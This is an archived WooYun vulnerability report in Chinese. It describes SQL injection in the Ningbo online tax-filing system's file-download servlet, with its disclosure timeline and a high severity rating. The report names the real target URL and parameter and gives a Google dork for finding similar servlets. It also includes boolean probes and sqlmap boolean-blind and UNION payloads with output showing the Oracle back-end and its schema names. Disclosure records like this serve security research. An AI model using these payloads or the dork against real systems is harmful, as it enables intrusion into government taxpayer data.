乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-10: 细节已通知厂商并且等待厂商处理中 2014-10-14: 厂商已经确认,细节仅向厂商公开 2014-10-24: 细节向核心白帽子及相关领域专家公开 2014-11-03: 细节向普通白帽子公开 2014-11-13: 细节向实习白帽子公开 2014-11-24: 细节向公众公开
宁波市网上办税系统SQL注入
看似用了https很安全但是google无意间发现由一处文件下载。java程序员文件下载代码很多都有sql注入问题google inurl:servlet/FileDown?fjxxId=https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=1https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=2
Place: GETParameter: fjxxId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fjxxId=1715 AND 4057=4057 Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: fjxxId=-1141 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(111)||CHR(99)||CHR(104)||CHR(113)||CHR(76)||CHR(67)||CHR(112)||CHR(106)||CHR(80)||CHR(86)||CHR(85)||CHR(122)||CHR(99)||CHR(102)||CHR(113)||CHR(122)||CHR(122)||CHR(102)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-----[21:20:50] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP 2.1, Apache 2.2.26back-end DBMS: Oracle[21:20:50] [INFO] fetching current database[21:20:50] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'NSFW'
支持union查询
[21:22:04] [INFO] fetching database (schema) names[21:22:04] [INFO] the SQL query used returns 4 entries[21:22:04] [INFO] resumed: "NSFW"[21:22:04] [INFO] resumed: "SYS"[21:22:04] [INFO] resumed: "SYSTEM"[21:22:04] [INFO] resumed: "WMSYS"
请找方欣科技有限公司开发。
危害等级:高
漏洞Rank:10
确认时间:2014-10-14 18:06
暂无